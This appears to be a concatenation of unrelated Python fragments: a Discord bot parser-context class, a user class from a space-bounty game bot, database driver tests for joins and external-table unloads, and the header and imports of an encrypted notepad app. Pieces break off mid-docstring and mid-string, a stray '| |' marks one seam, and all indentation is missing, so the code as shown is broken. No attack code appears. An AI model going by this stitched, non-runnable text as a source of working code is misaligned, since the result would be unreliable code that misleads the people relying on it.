__slots__ = ('client', 'content', 'index', 'last_part', 'last_start', 'length', 'message', 'result', 'separator', )
def __init__(self, separator, client, message, content):
"""
Creates a new ``ContentParserContext`` instance.
Parameters
----------
separator : ``ContentParameterSeparator``
The parameter separator of the parser.
client : ``Client``
The respective client.
message : ``Message``
The respective message.
content : `str`
A message's content after its prefix.
"""
self.separator = separator
self.client = client
self.message = message
self.index = 0
self.length = len(content)
self.content = content
self.last_part = None
self.last_start = 0
self.result = []
def get_next(self):
"""
Gets the next string part from a respective message's content.
Returns
-------
next_ : `str` or `None`
Returns `None` if the message has no more parts left.
"""
index = self.index
length = self.length
if index == length:
if self.last_start == index:
part = None
else:
part = self.last_part
else:
part, self.index = self.separator(self.content, index)
self.last_part = part
self.last_start = index
return part
def mark_last_as_used(self):
"""
Marks the last returned string as used up, making the next call try to parse a
new one.
"""
self.last_start = self.index
def get_rest(self):
"""
Returns the not yet used string part of ``.content``.
Returns
-------
rest : `str`
May be an empty string.
"""
last_start = self.last_start
rest = self.content
if last_start:
rest = rest[last_start:]
return rest
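# Usage sketch (hypothetical, not from the original source): a converter pulls a
# part with get_next() and only commits it on success; the final part is
# re-offered to later parsers until mark_last_as_used() is called.
#
#     part = ctx.get_next()
#     converted = try_convert(part)  # try_convert is a hypothetical helper
#     if converted is not None:
#         ctx.mark_last_as_used()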
DEFAULT_TYPE_NONE = 0
DEFAULT_TYPE_OBJ = 1
DEFAULT_TYPE_CALL = 2
DEFAULT_TYPE_NAMES = ('DEFAULT_TYPE_NONE', 'DEFAULT_TYPE_OBJ', 'DEFAULT_TYPE_CALL', )
class ParserContextBase:
"""
Base class for parser contexts.
"""
__slots__ = ()
async def __call__(self, content_parser_ctx):
"""
Calls the ``ParserContextBase`` with the given content parser context.
This method is a coroutine.
Parameters
----------
content_parser_ctx : ``ContentParserContext``
The content parser context in which the conversion is executed.
Returns
-------
passed : `bool`
Whether parsing out the variable was successful.
"""
return True
def __repr__(self):
"""Returns the parser context's representation."""
return f'<{self.__class__.__name__}>'
class RestParserContext(ParserContextBase):
"""
Parser context used when getting rest value.
Attributes
----------
default : `Any`
The default object to return if the parser fails.
default_type : `int`
Describes how `default` is used up.
Possible values:
+-----------------------+-------+
| Respective name | Value |
+=======================+=======+
| DEFAULT_TYPE_NONE | 0 |
+-----------------------+-------+
| DEFAULT_TYPE_OBJ | 1 |
+-----------------------+-------+
| DEFAULT_TYPE_CALL | 2 |
+-----------------------+-------+
"""
__slots__ = ('default', 'default_type')
def __new__(cls, default_type, default):
"""
Creates a new parser context instance with the given parameters.
Parameters
----------
default_type : `int`
Describes how `default` is used up.
Possible values:
+-----------------------+-------+
| Respective name | Value |
+=======================+=======+
| DEFAULT_TYPE_NONE | 0 |
+-----------------------+-------+
| DEFAULT_TYPE_OBJ | 1 |
+-----------------------+-------+
| DEFAULT_TYPE_CALL | 2 |
+-----------------------+-------+
default : `Any`
The default object to return if the parser fails.
"""
self = object.__new__(cls)
self.default_type = default_type
self.default = default
return self
async def __call__(self, content_parser_ctx):
"""
Calls the ``RestParserContext`` with the given content parser context.
This method is a coroutine.
Parameters
----------
content_parser_ctx : ``ContentParserContext``
The content parser context in which the conversion is executed.
Returns
-------
passed : `bool`
Whether parsing out the variable was successful.
"""
result = content_parser_ctx.get_rest()
if (not result):
default_type = self.default_type
if default_type:
result = self.default
if default_type == DEFAULT_TYPE_CALL:
result = await result(self, content_parser_ctx)
content_parser_ctx.result.append(result)
return True
def __repr__(self):
"""Returns the parser context's representation."""
result = [
'<',
self.__class__.__name__,
]
default_type = self.default_type
if default_type:
result.append(' default_type=')
result.append(repr(default_type))
result.append(' (')
result.append(DEFAULT_TYPE_NAMES[default_type])
result.append('), default=')
result.append(repr(self.default))
result.append('>')
return ''.join(result)
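# Sketch (hypothetical default callable, not from the original source): with
# DEFAULT_TYPE_CALL the default itself is awaited when no rest content is left.
#
#     async def default_rest(parser_ctx, content_parser_ctx):
#         return content_parser_ctx.message.author.name
#
#     rest_parser = RestParserContext(DEFAULT_TYPE_CALL, default_rest)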
class ParserContext(ParserContextBase):
"""
Parser context used inside of chained content events.
Attributes
----------
converter : `async-callable`
A function that converts a part of the respective message's content.
flags : ``ConverterFlag``
Flags which describe what details the parser function should check.
type : `None` or `type`
Type info about the entity to parse.
"""
__slots__ = ('converter', 'flags', 'type')
def __new__(cls, flagged_annotation):
"""
Creates a new parser context instance with the given parameters.
Parameters
----------
flagged_annotation : ``FlaggedAnnotation``
Describes what type of entity and how it should be parsed.
Raises
------
TypeError
If `flagged_annotation` was given as `tuple`.
"""
type_ = flagged_annotation.annotation
if type(type_) is tuple:
raise TypeError(f'`flagged_annotation` cannot be given as `tuple`, when creating a `{cls.__name__}` '
f'instance, got {flagged_annotation!r}.')
self = object.__new__(cls)
self.flags = flagged_annotation.flags
self.type = type_
self.converter = CONVERTER_SETTING_TYPE_RELATION_MAP[type_].converter
return self
async def __call__(self, content_parser_ctx):
"""
Calls the ``ParserContext`` with the given content parser context.
This method is a coroutine.
Parameters
----------
content_parser_ctx : ``ContentParserContext``
The content parser context in which the conversion is executed.
Returns
-------
passed : `bool`
Whether parsing out the variable was successful.
"""
result = await self.converter(self, content_parser_ctx)
if result is None:
return False
content_parser_ctx.mark_last_as_used()
content_parser_ctx.result.append(result)
return True
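# Sketch (hypothetical, not from the original source): wrapping an annotation
# resolves its converter once at construction, e.g.
#     parser = ParserContext(FlaggedAnnotation(SomeEntityType))
# and awaiting parser(ctx) feeds successive content parts to that converter.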
def __repr__(self):
"""Returns the parser | |
# Repository: Laura7089/GOF2BountyBot
# Typing imports
from __future__ import annotations
from typing import Union, List, TYPE_CHECKING
if TYPE_CHECKING:
from .battles import DuelRequest
from .items import bbShip, bbModuleFactory, bbWeapon, bbTurret
from .items.modules import bbModule
from ..bbConfig import bbConfig
from . import bbInventory, bbInventoryListing
from ..userAlerts import UserAlerts
from datetime import datetime
from discord import Guild, Member
from . import bbGuild
from ..logging import bbLogger
# Dictionary-serialized bbShip to give to new players
defaultShipLoadoutDict = {"name": "Betty", "builtIn":True,
"weapons":[{"name": "Micro Gun MK I", "builtIn": True}],
"modules":[{"name": "Telta Quickscan", "builtIn": True}, {"name": "E2 Exoclad", "builtIn": True}, {"name": "IMT Extract 1.3", "builtIn": True}]}
# Default attributes to give to new players
defaultUserDict = {"credits":0, "bountyCooldownEnd":0, "lifetimeCredits":0, "systemsChecked":0, "bountyWins":0, "activeShip": defaultShipLoadoutDict, "inactiveWeapons":[{"item": {"name": "Nirai Impulse EX 1", "builtIn": True}, "count": 1}]}
# Reference value not pre-calculated from defaultUserDict. This is not used in the game's code, but provides a reference for game design.
defaultUserValue = 28970
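# Illustrative note (own addition): a brand new player would be constructed as
# bbUser(memberID), and resetUser() below re-equips the default "Betty" loadout
# described by defaultShipLoadoutDict.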
class bbUser:
"""A user of the bot. There is currently no guarantee that user still shares any guilds with the bot, though this is planned to change in the future.
:var id: The user's unique ID. The same as their unique discord ID.
:vartype id: int
:var credits: The amount of credits (currency) this user has
:vartype credits: int
:var lifetimeCredits: The total amount of credits this user has earned through hunting bounties (TODO: rename)
:vartype lifetimeCredits: int
:var bountyCooldownEnd: A utc timestamp representing when the user's cmd_check cooldown is due to expire
:vartype bountyCooldownEnd: float
:var systemsChecked: The total number of space systems this user has checked
:vartype systemsChecked: int
:var bountyWins: The total number of bounties this user has won
:vartype bountyWins: int
:var activeShip: The user's currently equipped bbShip
:vartype activeShip: bbShip
:var inactiveShips: The bbShips currently in this user's inventory (unequipped)
:vartype inactiveShips: bbInventory
:var inactiveModules: The bbModules currently in this user's inventory (unequipped)
:vartype inactiveModules: bbInventory
:var inactiveWeapons: The bbWeapons currently in this user's inventory (unequipped)
:vartype inactiveWeapons: bbInventory
:var inactiveTurrets: The bbTurrets currently in this user's inventory (unequipped)
:vartype inactiveTurrets: bbInventory
:var lastSeenGuildId: The ID of the guild where this user was last active. Not guaranteed to be present.
:vartype lastSeenGuildId: int
:var hasLastSeenGuildId: Whether or not the user currently has a lastSeenGuildId
:vartype hasLastSeenGuildId: bool
:var duelRequests: A dictionary mapping target bbUser objects to DuelRequest objects. Only contains duel requests issued by this user.
:vartype duelRequests: dict[bbUser, DuelRequest]
:var duelWins: The total number of duels the user has won
:vartype duelWins: int
:var duelLosses: The total number of duels the user has lost
:vartype duelLosses: int
:var duelCreditsWins: The total amount of credits the user has won through fighting duels
:vartype duelCreditsWins: int
:var duelCreditsLosses: The total amount of credits the user has lost through fighting duels
:vartype duelCreditsLosses: int
:var userAlerts: A dictionary mapping UserAlerts.UABase subtypes to instances of that subtype
:vartype userAlerts: dict[type, UserAlerts.UABase]
:var bountyWinsToday: The number of bounties the user has won today
:vartype bountyWinsToday: int
:var dailyBountyWinsReset: A datetime.datetime representing the time at which the user's bountyWinsToday should be reset to zero
:vartype dailyBountyWinsReset: datetime.datetime
:var pollOwned: Whether or not this user has a running ReactionPollMenu
:vartype pollOwned: bool
"""
def __init__(self, id : int, credits=0, lifetimeCredits=0,
bountyCooldownEnd=-1, systemsChecked=0, bountyWins=0, activeShip=None,
inactiveShips=None, inactiveModules=None, inactiveWeapons=None, inactiveTurrets=None,
lastSeenGuildId=-1, duelWins=0, duelLosses=0, duelCreditsWins=0, duelCreditsLosses=0,
alerts=None, bountyWinsToday=0, dailyBountyWinsReset=None, pollOwned=False):
"""
:param int id: The user's unique ID. The same as their unique discord ID.
:param int credits: The amount of credits (currency) this user has (Default 0)
:param int lifetimeCredits: The total amount of credits this user has earned through hunting bounties (TODO: rename) (Default 0)
:param float bountyCooldownEnd: A utc timestamp representing when the user's cmd_check cooldown is due to expire (Default -1)
:param int systemsChecked: The total number of space systems this user has checked (Default 0)
:param int bountyWins: The total number of bounties this user has won (Default 0)
:param bbShip activeShip: The user's currently equipped bbShip (Default None)
:param bbInventory inactiveShips: The bbShips currently in this user's inventory (unequipped) (Default empty bbInventory)
:param bbInventory inactiveModules: The bbModules currently in this user's inventory (unequipped) (Default empty bbInventory)
:param bbInventory inactiveWeapons: The bbWeapons currently in this user's inventory (unequipped) (Default empty bbInventory)
:param bbInventory inactiveTurrets: The bbTurrets currently in this user's inventory (unequipped) (Default empty bbInventory)
:param int lastSeenGuildId: The ID of the guild where this user was last active. Not guaranteed to be present. (Default -1)
:param int duelWins: The total number of duels the user has won (Default 0)
:param int duelLosses: The total number of duels the user has lost (Default 0)
:param int duelCreditsWins: The total amount of credits the user has won through fighting duels (Default 0)
:param int duelCreditsLosses: The total amount of credits the user has lost through fighting duels (Default 0)
:param userAlerts: A dictionary mapping either (UserAlerts.UABase subtypes or string UA ids from UserAlerts.userAlertsIDsTypes) to either (instances of that subtype or booleans representing the alert state) (Default {})
:type userAlerts: dict[type or str, UserAlerts.UABase or bool]
:param int bountyWinsToday: The number of bounties the user has won today (Default 0)
:param datetime.datetime dailyBountyWinsReset: A datetime.datetime representing the time at which the user's bountyWinsToday should be reset to zero (Default datetime.utcnow())
:param bool pollOwned: Whether or not this user has a running ReactionPollMenu (Default False)
:raise TypeError: When given an argument of incorrect type
"""
if type(id) == float:
id = int(id)
elif type(id) != int:
raise TypeError("id must be int, given " + str(type(id)))
if type(credits) == float:
credits = int(credits)
elif type(credits) != int:
raise TypeError("credits must be int, given " + str(type(credits)))
if type(lifetimeCredits) == float:
lifetimeCredits = int(lifetimeCredits)
elif type(lifetimeCredits) != int:
raise TypeError("lifetimeCredits must be int, given " + str(type(lifetimeCredits)))
if type(bountyCooldownEnd) == int:
bountyCooldownEnd = float(bountyCooldownEnd)
if type(bountyCooldownEnd) != float:
raise TypeError("bountyCooldownEnd must be float, given " + str(type(bountyCooldownEnd)))
if type(systemsChecked) == float:
systemsChecked = int(systemsChecked)
elif type(systemsChecked) != int:
raise TypeError("systemsChecked must be int, given " + str(type(systemsChecked)))
if type(bountyWins) == float:
bountyWins = int(bountyWins)
elif type(bountyWins) != int:
raise TypeError("bountyWins must be int, given " + str(type(bountyWins)))
# The None defaults above avoid Python's shared-mutable-default pitfall: without
# them, every bbUser created without explicit inventories would share the same
# bbInventory objects, and dailyBountyWinsReset would be fixed at import time.
if inactiveShips is None:
    inactiveShips = bbInventory.bbInventory()
if inactiveModules is None:
    inactiveModules = bbInventory.bbInventory()
if inactiveWeapons is None:
    inactiveWeapons = bbInventory.bbInventory()
if inactiveTurrets is None:
    inactiveTurrets = bbInventory.bbInventory()
if alerts is None:
    alerts = {}
if dailyBountyWinsReset is None:
    dailyBountyWinsReset = datetime.utcnow()
self.id = id
self.credits = credits
self.lifetimeCredits = lifetimeCredits
self.bountyCooldownEnd = bountyCooldownEnd
self.systemsChecked = systemsChecked
self.bountyWins = bountyWins
self.activeShip = activeShip
self.inactiveShips = inactiveShips
self.inactiveModules = inactiveModules
self.inactiveWeapons = inactiveWeapons
self.inactiveTurrets = inactiveTurrets
self.lastSeenGuildId = lastSeenGuildId
self.hasLastSeenGuildId = lastSeenGuildId != -1
self.duelRequests = {}
self.duelWins = duelWins
self.duelLosses = duelLosses
self.duelCreditsWins = duelCreditsWins
self.duelCreditsLosses = duelCreditsLosses
self.userAlerts = {}
# Convert the given user alerts to types and instances. The given alerts may be IDs instead of types, or booleans instead of instances.
for alertID in UserAlerts.userAlertsIDsTypes:
alertType = UserAlerts.userAlertsIDsTypes[alertID]
if alertType in alerts:
if isinstance(alerts[alertType], UserAlerts.UABase):
self.userAlerts[alertType] = alerts[alertType]
elif isinstance(alerts[alertType], bool):
self.userAlerts[alertType] = alertType(alerts[alertType])
else:
bbLogger.log("bbUsr", "init", "Given unknown alert state type for UA " + alertID + ". Must be either UABase or bool, given " + alerts[alertType].__class__.__name__ + ". Alert reset to default (" + str(alertType(bbConfig.userAlertsIDsDefaults[alertID])) + ")", category="usersDB", eventType="LOAD-UA_STATE_TYPE")
self.userAlerts[alertType] = alertType(bbConfig.userAlertsIDsDefaults[alertID])
elif alertID in alerts:
if isinstance(alerts[alertID], UserAlerts.UABase):
self.userAlerts[alertType] = alerts[alertID]
elif isinstance(alerts[alertID], bool):
self.userAlerts[alertType] = alertType(alerts[alertID])
else:
bbLogger.log("bbUsr", "init", "Given unknown alert state type for UA " + alertID + ". Must be either UABase or bool, given " + alerts[alertID].__class__.__name__ + ". Alert reset to default (" + str(alertType(bbConfig.userAlertsIDsDefaults[alertID])) + ")", category="usersDB", eventType="LOAD-UA_STATE_TYPE")
self.userAlerts[alertType] = alertType(bbConfig.userAlertsIDsDefaults[alertID])
else:
self.userAlerts[alertType] = alertType(bbConfig.userAlertsIDsDefaults[alertID])
self.bountyWinsToday = bountyWinsToday
self.dailyBountyWinsReset = dailyBountyWinsReset
self.pollOwned = pollOwned
def resetUser(self):
"""Reset the user's attributes back to their default values.
"""
self.credits = 0
self.lifetimeCredits = 0
self.bountyCooldownEnd = -1
self.systemsChecked = 0
self.bountyWins = 0
self.activeShip = bbShip.fromDict(defaultShipLoadoutDict)
self.inactiveModules.clear()
self.inactiveShips.clear()
self.inactiveWeapons.clear()
self.inactiveTurrets.clear()
self.duelWins = 0
self.duelLosses = 0
self.duelCreditsWins = 0
self.duelCreditsLosses = 0
self.pollOwned = False
def numInventoryPages(self, item : str, maxPerPage : int) -> int:
"""Get the number of pages required to display all of the user's unequipped items of the named type, displaying the | |
"a_byteint byteint, a_smallint "
"smallint, a_int integer, a_bigint bigint, "
"a_numps numeric(36,14), "
"a_nump numeric(5), a_dec decimal(15,7), "
"a_angle integer, a_date date, "
"a_time time, a_timetz timetz, a_timestamp "
"timestamp, a_interval interval ) "
"USING (DATAOBJECT "
"('/tmp/all_datatypes_retunload_ext_rs_odbc') "
"REMOTESOURCE "
"'odbc' DELIMITER ',' DATESTYLE 'DMY' "
"COMPRESS 'false' ENCODING 'internal')")
self.cursor.execute("INSERT INTO all_datatypes_retunload_ext "
"SELECT * from all_datatypes")
except Exception as e:
self.assertEqual(str(e), "ERROR: Remotesource option "
"of external table "
"was not defined to load/unload "
"using a python client\n\x00",
"ERROR: Data Difference")
self.cursor.execute("drop table all_datatypes_retunload_ext")
self.cursor.execute("drop table all_datatypes")
def test_RemoteUnloadBasicCompressed(self):
self.performOperation("./setup_all_datatype")
self.cursor.execute("CREATE EXTERNAL TABLE "
"all_datatypes_retunload_ext "
"(a_srno integer, a_char5"
"char(5), a_char20 char(20) not NULL, "
"a_char1000 char(1000), "
"a_varchar1 varchar(1), a_varchar50 varchar(50), "
"a_real float(5), "
"a_double float(15), a_byteint byteint, "
"a_smallint smallint, "
"a_int integer, a_bigint bigint, "
"a_numps numeric(36,14), "
"a_nump numeric(5), a_dec decimal(15,7), "
"a_angle integer, "
"a_date date, a_time time, a_timetz timetz, "
"a_timestamp timestamp, "
"a_interval interval ) USING "
"(DATAOBJECT "
"('/tmp/all_datatypes_retunload_ext_compressed')"
"REMOTESOURCE 'python' COMPRESS 'true' FORMAT "
"'internal' ENCODING 'internal')")
self.cursor.execute("INSERT INTO all_datatypes_retunload_ext "
"SELECT * from all_datatypes")
self.assertEqual(12, self.cursor.rowcount, "ERROR: Data Difference")
self.cursor.execute("drop table all_datatypes_retunload_ext")
self.cursor.execute("drop table all_datatypes")
def test_Joins1(self):
self.performOperation("./setup_all_datatype")
self.cursor.execute("SELECT * FROM all_datatypes AS tab1 NATURAL JOIN "
"all_datatypes AS tab2 ORDER BY "
"tab1.a_srno, tab2.a_srno")
results = self.cursor.fetchall()
c = 0
for c1, c2, c3, c4, c5, c6, c7, c8, c9, c10, c11, \
c12, c13, c14, c15, c16, c17, c18, c19, c20, c21 \
in results:
c = c + 1
self.assertEqual(5, c, "ERROR: Data Difference")
self.cursor.execute("SELECT * FROM all_datatypes AS tab1 INNER JOIN "
"all_datatypes AS tab2 using(a_srno) ORDER BY "
"tab1.a_srno, tab2.a_srno")
results = self.cursor.fetchall()
c = 0
for c1, c2, c3, c4, c5, c6, c7, c8, c9, c10, \
c11, c12, c13, c14, c15, c16, c17, c18, c19, c20, \
c21, d1, d2, d3, d4, d5, d6, d7, d8, d9, d10, d11, \
d12, d13, d14, d15, d16, d17, d18, d19, d20 \
in results:
c = c + 1
self.assertEqual(12, c, "ERROR: Data Difference")
self.cursor.execute("SELECT * FROM all_datatypes SELF JOIN "
"all_datatypes USING (a_srno)")
results = self.cursor.fetchall()
c = 0
for c1, c2, c3, c4, c5, c6, c7, c8, c9, c10, c11, c12, \
c13, c14, c15, c16, c17, c18, c19, c20, c21, d1, d2, \
d3, d4, d5, d6, d7, d8, d9, d10, d11, d12, d13, d14, d15, \
d16, d17, d18, d19, d20 \
in results:
c = c + 1
self.assertEqual(12, c, "ERROR: Data Difference")
self.cursor.execute("drop table all_datatypes")
def test_Joins2(self):
self.performOperation("./setup_all_datatype")
self.cursor.execute("SELECT * FROM all_datatypes AS tab1 "
"RIGHT OUTER JOIN "
"all_datatypes AS tab2 USING(a_char20) ORDER BY "
"tab1.a_srno,tab2.a_srno")
results = self.cursor.fetchall()
c = 0
for c1, c2, c3, c4, c5, c6, c7, c8, c9, c10, \
c11, c12, c13, c14, c15, c16, c17, c18, c19, \
c20, c21, d1, d2, d3, d4, d5, d6, d7, d8, d9, \
d10, d11, d12, d13, d14, d15, d16, d17, d18, d19, d20 \
in results:
c = c + 1
self.assertEqual(14, c, "ERROR: Data Difference")
self.cursor.execute("SELECT * FROM all_datatypes AS tab1 LEFT OUTER "
"JOIN all_datatypes AS tab2 USING(a_char20) "
"ORDER BY tab1.a_srno,tab2.a_srno")
results = self.cursor.fetchall()
c = 0
for c1, c2, c3, c4, c5, c6, c7, c8, c9, c10, c11, \
c12, c13, c14, c15, c16, c17, c18, c19, c20, c21, \
d1, d2, d3, d4, d5, d6, d7, d8, d9, d10, d11, d12, d13, \
d14, d15, d16, d17, d18, d19, d20 \
in results:
c = c + 1
self.assertEqual(14, c, "ERROR: Data Difference")
self.cursor.execute("drop table all_datatypes")
def test_Joins3(self):
self.performOperation("./setup_all_datatype")
self.performOperation("./setup_all_latin")
self.cursor.execute("SELECT * FROM all_Latin_datatypes, all_datatypes "
"ORDER BY all_latin_datatypes.a_srno,"
"all_datatypes.a_srno")
results = self.cursor.fetchall()
c = 0
for c1, c2, c3, c4, c5, c6, c7, c8, c9, c10,\
c11, c12, c13, c14, c15, c16, c17, c18, c19, c20, \
c21, d1, d2, d3, d4, d5 \
in results:
c = c + 1
self.assertEqual(180, c, "ERROR: Data Difference")
self.cursor.execute("drop table all_datatypes")
self.cursor.execute("drop table all_latin_datatypes")
def test_DirectMixedComments(self):
self.cursor.execute("CREATE TABLE test (int1 int, char1 char)")
self.cursor.execute("INSERT INTO test VALUES /* "
"this is a comment */ (1, 'c')")
self.assertEqual(1, self.cursor.rowcount, "ERROR: Data Difference")
self.cursor.execute("INSERT INTO test VALUES -- "
"this is a comment \n (2, 'a')")
self.assertEqual(1, self.cursor.rowcount, "ERROR: Data Difference")
self.cursor.execute("INSERT INTO test VALUES /* this is "
"-- a comment */ (3, 'b')")
self.assertEqual(1, self.cursor.rowcount, "ERROR: Data Difference")
self.cursor.execute("drop table test ")
def test_NumericFnEscSeq(self):
self.performOperation("./setup_all_datatype")
self.cursor.execute("SELECT abs(a_int), abs(a_smallint), "
"abs (a_bigint), "
"abs(a_double), abs(a_numps) FROM all_datatypes "
"ORDER BY a_srno limit 1")
results = self.cursor.fetchall()
for c1, c2, c3, c4, c5 in results:
self.assertEqual(798339977, c1, "ERROR: Data Difference")
self.assertEqual(31380, c2, "ERROR: Data Difference")
self.assertEqual(780406997461985024, c3, "ERROR: Data Difference")
self.assertEqual(4242424422.60277, c4, "ERROR: Data Difference")
self.assertEqual('53.00000000000000', c5, "ERROR: Data Difference")
self.cursor.execute("SELECT round(a_numps), round(a_real), "
"round(a_double) "
"FROM all_datatypes ORDER BY a_srno limit 1")
results = self.cursor.fetchall()
for c1, c2, c3 in results:
self.assertEqual('53', c1, "ERROR: Data Difference")
self.assertEqual(0, c2, "ERROR: Data Difference")
self.assertEqual(-4242424423, c3, "ERROR: Data Difference")
self.cursor.execute("SELECT sqrt(a_srno), sqrt(a_nump) "
"FROM all_datatypes "
"ORDER BY a_srno limit 1")
results = self.cursor.fetchall()
for c1, c2 in results:
self.assertEqual(7.615773105863909, c1, "ERROR: Data Difference")
self.assertEqual(None, c2, "ERROR: Data Difference")
self.cursor.execute("drop table all_datatypes")
def test_SetOperator1(self):
self.performOperation("./setup_all_datatype")
self.cursor.execute("SELECT a_srno, a_char5, a_varchar1 "
"FROM all_datatypes "
"WHERE a_srno = ANY (SELECT a_srno "
"FROM all_datatypes "
"WHERE a_char1000 LIKE ?) ORDER "
"BY a_srno", ('%',))
results = self.cursor.fetchall()
c = 0
for c1, c2, c3 in results:
c = c + 1
self.assertEqual(12, c, "ERROR: Data Difference")
self.cursor.execute("SELECT a_srno, a_char5, a_date FROM "
"all_datatypes "
"WHERE a_srno = SOME (SELECT a_srno "
"FROM all_datatypes "
"WHERE a_date LIKE ?) ORDER BY a_srno", ('%',))
results = self.cursor.fetchall()
c = 0
for c1, c2, c3 in results:
c = c + 1
self.assertEqual(11, c, "ERROR: Data Difference")
self.cursor.execute("SELECT a_srno,a_varchar50 "
"FROM all_datatypes "
"a WHERE a_srno > ALL "
"(SELECT a_srno FROM all_datatypes "
"b WHERE a.a_srno <> b.a_srno)")
results = self.cursor.fetchall()
c = 0
for c1, c2 in results:
c = c + 1
self.assertEqual(1, c, "ERROR: Data Difference")
self.cursor.execute("drop table all_datatypes")
def test_SetOperator2(self):
self.performOperation("./setup_all_datatype")
self.cursor.execute("SELECT a_srno, a_char20 FROM "
"all_datatypes WHERE EXISTS "
"(SELECT a_srno FROM all_datatypes "
"WHERE a_char5 LIKE ?) "
"ORDER BY a_srno LIMIT 5", ('%',))
results = self.cursor.fetchall()
c = 0
for c1, c2 in results:
c = c + 1
self.assertEqual(5, c, "ERROR: Data Difference")
self.cursor.execute("SELECT a_srno,a_char20, a_interval "
"FROM all_datatypes "
"WHERE NOT EXISTS (SELECT a_char5 FROM "
"all_datatypes WHERE a_interval LIKE ?) "
"ORDER BY a_srno DESC LIMIT 5",
('25 years 67 days 18 hours 10 minutes',))
results = self.cursor.fetchall()
c = 0
for c1, c2, c3 in results:
c = c + 1
self.assertEqual(5, c, "ERROR: Data Difference")
self.cursor.execute("drop table all_datatypes")
def test_SetOperator3(self):
self.performOperation("./setup_all_datatype")
self.cursor.execute("SELECT a_srno, a_char20 FROM all_datatypes "
"WHERE a_char20 NOT IN (a_char5, "
"a_varchar50 )ORDER BY a_srno")
results = self.cursor.fetchall()
c = 0
for c1, c2 in results:
c = c + 1
self.assertEqual(11, c, "ERROR: Data Difference")
self.cursor.execute("SELECT a_srno, a_time FROM all_datatypes a WHERE "
"a_srno IN (SELECT a_srno FROM all_datatypes b "
"WHERE a.a_srno = b.a_srno) ORDER BY a_srno")
results = self.cursor.fetchall()
c = 0
for c1, c2 in results:
c = c + 1
self.assertEqual(12, c, "ERROR: Data Difference")
self.cursor.execute("SELECT a_srno, a_nump FROM "
"all_datatypes WHERE a_char5 "
"NOT IN (a_varchar1) AND a_srno "
"IN (SELECT a_srno FROM "
"all_datatypes WHERE a_nump IS "
"NOT NULL) ORDER BY a_srno")
results = self.cursor.fetchall()
c = 0
for c1, c2 in results:
c = c + 1
self.assertEqual(9, c, "ERROR: Data Difference")
self.cursor.execute("drop table all_datatypes")
def test_SetOperator4(self):
self.performOperation("./setup_all_latin")
self.performOperation("./setup_all_datatype")
self.cursor.execute("SELECT a_srno, a_char20, "
"a_char1000 FROM all_datatypes "
"UNION SELECT a_srno, a_char10, "
"a_char1000 FROM all_latin_datatypes "
"WHERE a_srno IN (SELECT a_srno "
"FROM all_datatypes WHERE a_nump "
"IS NOT NULL)"
" ORDER BY a_srno")
results = self.cursor.fetchall()
c = 0
# Repository: kajitetsuya/Encrypted_Notepad
"""
Encrypted Notepad
Copyright (c) 2020 by <NAME>
This software is licensed by the MIT license.
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
Except as contained in this notice, the name(s) of the above copyright holders
shall not be used in advertising or otherwise to promote the sale, use or
other dealings in this Software without prior written authorization.
Icon made by Freepik from www.flaticon.com
"""
# https://stackoverflow.com/questions/23571407/how-to-i-have-the-call-back-in-tkinter-when-i-change-the-current-insert-position
# Problem with 'sel':
# https://stackoverflow.com/questions/47184080/how-do-i-track-whether-a-tkinter-text-widget-has-been-modified-using-a-proxy-tha
# Solution to 'sel':
# https://codereview.stackexchange.com/questions/178139/simple-tkinter-gui-that-uses-a-popup-menu-class
# Printing function seems to be not platform-free
# https://stackoverflow.com/questions/12723818/print-to-standard-printer-from-python
# Tuple ()
# List []
# Set {}
# Dictionary
# https://www.iconfinder.com/iconsets/filetype-4
# https://www.iconfinder.com/iconsets/material-circle-apps
# https://www.iconfinder.com/iconsets/basic-ui-1-line
# https://www.iconfinder.com/iconsets/security-double-colour-blue-black-vol-1
# Icons made by <a href="http://www.freepik.com/" title="Freepik">Freepik</a> from <a href="https://www.flaticon.com/" title="Flaticon"> www.flaticon.com</a>
# https://www.flaticon.com/free-icon/lock_2913133?term=security&page=2&position=2
# https://medium.com/sanchit-gupta/executable-gui-with-python-fc79562a5558
# https://github.com/pyinstaller/pyinstaller/issues/4047
# https://stackoverflow.com/questions/38674400/missing-dll-files-when-using-pyinstaller/38682416
# Create a Python environment named 'crypto_regex_pyinstaller_env' with packages cryptography, regex, and pyinstaller
# Put security.ico in the source folder along with this file
# Open the PowerShell and move to the source folder and execute
# pyinstaller Encrypted_Notepad.py --onefile --noconsole --name=enotepad --paths=C:\Users\User\.conda\envs\crypto_regex_pyinstaller_env\Library\bin --icon=security.ico --add-data="security.ico;."
# https://stackoverflow.com/questions/47840633/hide-console-window-by-an-exe-file-executed-by-a-py-script
# https://stackoverflow.com/questions/41129537/hide-the-console-of-an-exe-file-created-with-pyinstaller
# Want to also use the "-key" option
# https://pyinstaller.readthedocs.io/en/stable/usage.html#options
# Implement encoding
# Remember open folder (this is already implemented... how does it work?)
# When you maximize the window with double click on the title bar, the selection is canceled...
# This happens because a single click is induced at the place where the double click took place.
# So if you bring the normal window at the top (so that the point at which you double click will not be in the text
# even after maximizing the window), then the selection is not canceled...
# Bind delete directly to the internal listbox object
# => Well, then we also need to add the new keyword to the list through the internal listbox, which is too much dependence on the internal object IMO.
import sys
import tkinter as tk
from tkinter import filedialog
from tkinter import simpledialog
from tkinter.simpledialog import Dialog
from tkinter import messagebox
from tkinter import font
#from tkinter.font import families
from tkinter import ttk
from tkinter import colorchooser
from tkinter.colorchooser import askcolor
#from tkinter import commondialog
#import tkfontchooser
#from tkfontchooser import askfont
from datetime import datetime
# To create a "generate random string" functionality
import os
import string
from random import *
# To open OnScreen Keyboard on Windows
import platform
import subprocess
# subprocess.Popen(['osk'], shell=True) # Windows
# os.system('open -a KeyboardViewer') # Mac
